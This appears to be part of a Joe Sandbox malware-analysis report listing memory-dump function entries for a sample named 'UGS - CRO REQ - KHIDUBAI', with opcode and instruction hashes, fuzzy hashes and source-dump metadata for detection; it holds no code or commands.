Instruction ID: 792bf8373d58ed75c247b4646c8e3cae5f0b72833c47ebad98a8b1844da45b3a
Opcode Fuzzy Hash: bd93641e6d33df8eb933f4683de979016bc03c1305402254da08b17ff3489d1c
Instruction Fuzzy Hash: 92D02B32B002156B8B0493FC74001AE77F88FC51B43104226D61DC22D0E932CC018390

Uniqueness

Uniqueness Score: -1.00%

Function 046A6C00 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 625968d28ef3148a1c33bc4c95f550e559bf9486f4e9a86d8e16032c8cc78f66
Instruction ID: fbc533005bc02da2bad629db70bd5120244bde4f1ccec085e0bd6a8a413a8942
Opcode Fuzzy Hash: 625968d28ef3148a1c33bc4c95f550e559bf9486f4e9a86d8e16032c8cc78f66
Instruction Fuzzy Hash: 02E01A34904208EFCB00DF98D94499CBBB8FB49311F148195E84517361D631AEA0DF90

Uniqueness

Uniqueness Score: -1.00%

Function 046A6658 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b66edc2b0aa11a84a2bfe8575d30ec4c4274101c098aa6947ca9dec6d95e3f02
Instruction ID: 2ad9c308d7b1d227cbb18712c7ff6417ebd320c4eff679cb7c1080e432d53b96
Opcode Fuzzy Hash: b66edc2b0aa11a84a2bfe8575d30ec4c4274101c098aa6947ca9dec6d95e3f02
Instruction Fuzzy Hash: 7BE04F70E05308EFDB04EFA8D5446ACBBB9EB48304F1481E9C848A3340E7356A51DF41

Uniqueness

Uniqueness Score: -1.00%

Function 058CEAB0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ec39555cdd75dc4b8ea37c359c1814344a062f8d7d4143bed3f30b50ac3b7f9
Instruction ID: f56bbc6b4ab7a0773f8f95abee2e3ca3da92befb468d894a803e3aa8a3676b96
Opcode Fuzzy Hash: 4ec39555cdd75dc4b8ea37c359c1814344a062f8d7d4143bed3f30b50ac3b7f9
Instruction Fuzzy Hash: 72E04F74908208EFC704DF98E951A6DBF7DBB59301F1481D9DC4597381C6329A41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 01EF6CB0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecac5f4698e1c22ab829fc2fd8ba0315df6ddf34631788e008ad9c6d9b9236df
Instruction ID: 81768dd992596d1bc25193aee6aede9e14da0053f391b7a85a69f844de109687
Opcode Fuzzy Hash: ecac5f4698e1c22ab829fc2fd8ba0315df6ddf34631788e008ad9c6d9b9236df
Instruction Fuzzy Hash: 50E01A34D04208EBC704DF98E5556ACBBB8EB8C304F1481EACC5857381C6315A45CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01F150C8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 629891063dc8914a89467fd4a29b1128bf8b3e2a49efa6f1cea4a8b6ac81bd42
Instruction ID: 30764e1eafb468caf5c3512938fe26bb0be688ea1c424183f1c59fb61a5a18aa
Opcode Fuzzy Hash: 629891063dc8914a89467fd4a29b1128bf8b3e2a49efa6f1cea4a8b6ac81bd42
Instruction Fuzzy Hash: E1E08634904208EBC704DF98E94596CBF78EB89300F20C199DC4817354D6325A51DB80

Uniqueness

Uniqueness Score: -1.00%

Function 046AFF78 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ec9aa8e2e6e09992130af810f5f34f03668f6414de957ce81056cf5d9b57160
Instruction ID: df4c302c9c9d30a4cbb602d846d79b0ba036823cefdb936cc200f7f1a436584b
Opcode Fuzzy Hash: 7ec9aa8e2e6e09992130af810f5f34f03668f6414de957ce81056cf5d9b57160
Instruction Fuzzy Hash: 14E0C230809108EFC704DFA8E981ABDBFBCAB4A301F1081E9D80423380DA301E51DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 046A7AE8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c9ed8490eba583a4473250ba6c0a9831bc7e795a99b5379df090938e55c54c3
Instruction ID: 26e1c1c059931c25a2b48632c05f60b0c75ef4ff6c33b3b45873cf242bec56bb
Opcode Fuzzy Hash: 9c9ed8490eba583a4473250ba6c0a9831bc7e795a99b5379df090938e55c54c3
Instruction Fuzzy Hash: D5E0E674905208DFC744DFACD65569CFBF8EB49305F1441E9C808D7341E631AE56CB41

Uniqueness

Uniqueness Score: -1.00%

Function 046A8BD0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 127e6329298f50e980830a667ced19f5b5eba5fa9785a6522a389a3b6e440ae5
Instruction ID: 38712bbddc9a9dba45678a9c132755a8b524a1476679d86339177b2011c72d5d
Opcode Fuzzy Hash: 127e6329298f50e980830a667ced19f5b5eba5fa9785a6522a389a3b6e440ae5
Instruction Fuzzy Hash: B0E04F71E01308AFEB54DFB8E9016AD77F5EB85320F104B59D41597284EA714E01AB50

Uniqueness

Uniqueness Score: -1.00%

Function 001E0C80 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e435cc90e8fd908d0e1b8060ccfb24e4262048203df31b576feaa0869c30c81
Instruction ID: e6f5a797d239b31dc65919f76687eb54938cd3926fbcf6133ce83006dd416c96
Opcode Fuzzy Hash: 7e435cc90e8fd908d0e1b8060ccfb24e4262048203df31b576feaa0869c30c81
Instruction Fuzzy Hash: 82E04F71E06248DFC785DFB8E90069C7BB0DF49205B5049EAD444D7255E6305F099B40

Uniqueness

Uniqueness Score: -1.00%

Function 058C7D08 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 828c785edc7f8d202c9287908c7d7e7e7ebe1060004d2e2c8beee3f8d676ee2f
Instruction ID: 7f166cb836341b51259755ca73ac2f26bfd07c84c41ef97ce8b2c4dd8235a3a9
Opcode Fuzzy Hash: 828c785edc7f8d202c9287908c7d7e7e7ebe1060004d2e2c8beee3f8d676ee2f
Instruction Fuzzy Hash: 95E0E534D08208ABC704DFA8E5516BCBFB8EB88204F1481EED84997385CA359E42CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01EF69B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aef4476b411122acdd3af5eac9e0fd82c9688770d86afc0b139527d1bdb5436f
Instruction ID: faf2adb3ca7791b19df15667256a1c5ef89a3824b1134a67a421cd8735308309
Opcode Fuzzy Hash: aef4476b411122acdd3af5eac9e0fd82c9688770d86afc0b139527d1bdb5436f
Instruction Fuzzy Hash: C8E0B630905208DBC745EFA8D55529CBBB9EB09305F5415A9C94896240E6315A84CB41

Uniqueness

Uniqueness Score: -1.00%

Function 01EF78A0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75d8a26d68c6835df09897d095e02cc361b3e071b34c44f96ffdd0da348c396f
Instruction ID: 270e52cab85846cf514ca2787b27807e5424268555a8f055ee19c63eded725e2
Opcode Fuzzy Hash: 75d8a26d68c6835df09897d095e02cc361b3e071b34c44f96ffdd0da348c396f
Instruction Fuzzy Hash: DCE0C231802208DBD700FFBDD810B4E7FA8DB04308F0044FAD50493260DE315A0497A6

Uniqueness

Uniqueness Score: -1.00%

Function 01EFB028 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
Instruction ID: 9f01113cce538188e0ec8a1bedc87ecd86300c3a48006ec4165e1877226274bb
Opcode Fuzzy Hash: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
Instruction Fuzzy Hash: C0E01234909208DBC704DF98E9555ADBF78EB89305F14D1DDCD081B381CA325E42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01EFC5D8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
Instruction ID: 10da5560f4cef563701c096e75371fc3b55d7392fa3e517b99961765b32cb0ea
Opcode Fuzzy Hash: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
Instruction Fuzzy Hash: 74E0EC74909208DBC708DF98EA559ACBB78EB89305F2491DDCD0927381CA319A42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01EFB578 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
Instruction ID: 12ba66e6e3905970f6aad0b505db5e9e573169027381232b7290cc864ba7e34e
Opcode Fuzzy Hash: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
Instruction Fuzzy Hash: D8E01234909208DBD704DF98E9559ACBF79EB8D305F1491DDCD0917381DA329E52CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01EFA4A8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
Instruction ID: 1265324ab0bf3ea7dad9c7a4873be4308bfa38eb4c55910a0363598fe2e62716
Opcode Fuzzy Hash: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
Instruction Fuzzy Hash: 5CE01234909208DBC704EF98E9555ACBF7CEB89305F1491EDCD0C1B381CA315E42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01EF9490 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
Instruction ID: a8bbaed9ed6c122b21b967e26102e9038c26c63224fa81b45c60c14c62acac60
Opcode Fuzzy Hash: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
Instruction Fuzzy Hash: 65E0C234908208DBC704DF98E9816ACBF78EB89318F2091DDDC481B381CA325E42CB80

Uniqueness

Uniqueness Score: -1.00%

Function 01EF7C78 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac1ec672629e9d25ea2bdec1c0deb8b3b674620eb1842d56186acc8d1ef4c78
Instruction ID: 9a1e1005761fcf388c1224ed6f5afbd401ea9b44591cf5625b4b5a8865f2e5a1
Opcode Fuzzy Hash: 3ac1ec672629e9d25ea2bdec1c0deb8b3b674620eb1842d56186acc8d1ef4c78
Instruction Fuzzy Hash: 73E01234909144DFD758CBA8E951BACBF789B4D208F1451DDC94957392DA324D42CB01

Uniqueness

Uniqueness Score: -1.00%

Function 01EFBF88 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
Instruction ID: 9e203545b8a6a919a3bfd451e75feb90218b033a9e07a531c63169764c344663
Opcode Fuzzy Hash: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
Instruction Fuzzy Hash: 30E01234909208DBD708DF98E9555ACBF7CEB89305F2491DDDD0857381CB325E82DB81

Uniqueness

Uniqueness Score: -1.00%

Function 01EF8F48 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
Instruction ID: aaf887794b791ad3120e6eda345cd848f0cccc760ce41afcedbf15f87f224809
Opcode Fuzzy Hash: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
Instruction Fuzzy Hash: 88E0123490920CDFC704DF98E9559ACBF79EB89305F1492DDDD0867381CA315E82CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01EF8690 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
Instruction ID: 232878c6dcc967440aa451c2616ce035f46d7ebc2cc43de385217e1a883eb27f
Opcode Fuzzy Hash: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
Instruction Fuzzy Hash: 7EE01234909208DBC704DF98E9559ACBF78EB89305F2491EDCD0817385CA319E42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01EF9E30 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
Instruction ID: 819622bc3ce4726f0e40827e0b0f20f548ff89dba035a002558b4a9a3a44536c
Opcode Fuzzy Hash: 858da738e7f86acd38ee93985c809ebd4b4cc0376fb48ce5dfc8433a513c5415
Instruction Fuzzy Hash: BBE0EC38909208DBC704DF98E9556ACBBB8EB8A319F2491DDED4817381CB316A46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01F126D7 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e4ed462fe8f95e8356b99f83eb21abf8e158ba21791d9d199370be5657d3018
Instruction ID: d1a1f4671da5d11e10c42f4e5ff4ca04ee4e62a43b8051e9511abd31c0b61766
Opcode Fuzzy Hash: 8e4ed462fe8f95e8356b99f83eb21abf8e158ba21791d9d199370be5657d3018
Instruction Fuzzy Hash: 46E08630D04208DBCF08CF98E5515ACBF74EB8A314F2081DDC80417384C6324E41DF40

Uniqueness

Uniqueness Score: -1.00%

Function 01F13E90 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bec5528128390ae9ae85fd8975a99605cdfb82d43bf044cecb441d0b170006d
Instruction ID: f7f3be1f916812f32ed0581d5954c20aca54f61eb75951e06f027a3107271736
Opcode Fuzzy Hash: 0bec5528128390ae9ae85fd8975a99605cdfb82d43bf044cecb441d0b170006d
Instruction Fuzzy Hash: ABE01234909308DBD704DF98E95556DBF78FB89315F2491D9D80817385CB325E46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 046A6790 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15e7eaa5df35d80039b2834e9fffe56666118728adfc7b695f687d32b1fd22a4
Instruction ID: 321633b25f188601277aea9501799e3f26cd2b3ce9c498d352275c6e57366ff8
Opcode Fuzzy Hash: 15e7eaa5df35d80039b2834e9fffe56666118728adfc7b695f687d32b1fd22a4
Instruction Fuzzy Hash: 75E0EC30915208EFCB50DFA8E95979CBBB8AB48605F1441A9C84893350E630AA50CB45

Uniqueness

Uniqueness Score: -1.00%

Function 058C4F08 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa1b0504e33501e1292671c2950b6f7eb9caf1a87a2643cdd4fad25a58951250
Instruction ID: be5909703463068d0216e87cded2d1e7ed352123f61e23f3f4e3c6c618bee8d3
Opcode Fuzzy Hash: aa1b0504e33501e1292671c2950b6f7eb9caf1a87a2643cdd4fad25a58951250
Instruction Fuzzy Hash: F4E02B31802208DBDB00FFF9D82174E7FA8EB04308F0004EED50593270DE314E0097A1

Uniqueness

Uniqueness Score: -1.00%

Function 058CCA68 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d11103d772968bb3795b2004fa1ef5713e99ab77c2d2985c2296057141e70fae
Instruction ID: 0b5d54375851aa6a72bea96f771b186151d99a770224846cc529339adb8f55d8
Opcode Fuzzy Hash: d11103d772968bb3795b2004fa1ef5713e99ab77c2d2985c2296057141e70fae
Instruction Fuzzy Hash: CCE01274A09208EBC704DFA8FA5556CBF79FB89305F1491DDCC0957781DA319E42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01F1225C Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88d4c0abfd5b095e06d6fb941ff55282839cc522340c551e54e3bb5531077e2b
Instruction ID: ff8ab2669d690f970653d410b0515a037cecf936db5175abd8788ae310d45665
Opcode Fuzzy Hash: 88d4c0abfd5b095e06d6fb941ff55282839cc522340c551e54e3bb5531077e2b
Instruction Fuzzy Hash: 09D01230949244DFDB44CF98E551ABCB7A8EB9B315F24529DC81957391D6734D02CB01

Uniqueness

Uniqueness Score: -1.00%

Function 046A66D0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fec47c676dbcd89a1af7824f7bb8782cad43fafe4a2410f27d9ce63760878726
Instruction ID: 4931c8349ce82151182a8ee5408927e26f7a98ca3ba83bf50a2f6f989dc1787f
Opcode Fuzzy Hash: fec47c676dbcd89a1af7824f7bb8782cad43fafe4a2410f27d9ce63760878726
Instruction Fuzzy Hash: D5D05B30D45208DBC704DFA4E9555AD7B79EB46305F1451E9C44417340D7315D51DF55

Uniqueness

Uniqueness Score: -1.00%

Function 046A428F Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f0bb1fd415b493481005d4b434598e78537f31a80c77d3e8e937f857c4937b
Instruction ID: 538dbd8d0bf78a406198766d6f7678922a38f9ee35f90340c07431d017e1948e
Opcode Fuzzy Hash: a4f0bb1fd415b493481005d4b434598e78537f31a80c77d3e8e937f857c4937b
Instruction Fuzzy Hash: 7CF0F4B4A5562ACFCB64DF24DD547AABBB1BB48206F4041F9941DA3250DB341E81DF04

Uniqueness

Uniqueness Score: -1.00%

Function 046A6A80 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20c2fcb711ec73e64255f3ce0cb39352c89336dcb134bda50094707d422d86ac
Instruction ID: d45948749a14947a35a0eacfda1d7572723d32ef7b7eab7478faac8ba050d0d9
Opcode Fuzzy Hash: 20c2fcb711ec73e64255f3ce0cb39352c89336dcb134bda50094707d422d86ac
Instruction Fuzzy Hash: FCD0123090560CDBC714DFA4E94956D7F78E745305F245195C54423394D6312D65DA85

Uniqueness

Uniqueness Score: -1.00%

Function 046A8BD8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00432c8b82b396ad9047b785755f55299aedc6a9c14a0d9cc458bacb90a64a8e
Instruction ID: 3a0a199efb0b98bed136657d33b84ab97ada40e603917a8a282f128f20d76f8b
Opcode Fuzzy Hash: 00432c8b82b396ad9047b785755f55299aedc6a9c14a0d9cc458bacb90a64a8e
Instruction Fuzzy Hash: D1E01271A0130CEFD704EFB5E94176D77F5EB85600F504999E508DB244EA759F01AB84

Uniqueness

Uniqueness Score: -1.00%

Function 01EF7C80 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9b7304e2667c449a67c42153793bab3a0451ab75078c441a5ec6daeda8a3bd4
Instruction ID: 3209e06477d8734e71471d31ae29cabfca2993856375c0e8968def687e13e700
Opcode Fuzzy Hash: e9b7304e2667c449a67c42153793bab3a0451ab75078c441a5ec6daeda8a3bd4
Instruction Fuzzy Hash: 7CD05E34909108DBC748CB98E951B6CBBBCEB4E204F1460DDCD0957381DA329D02C740

Uniqueness

Uniqueness Score: -1.00%

Function 01F12ABC Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
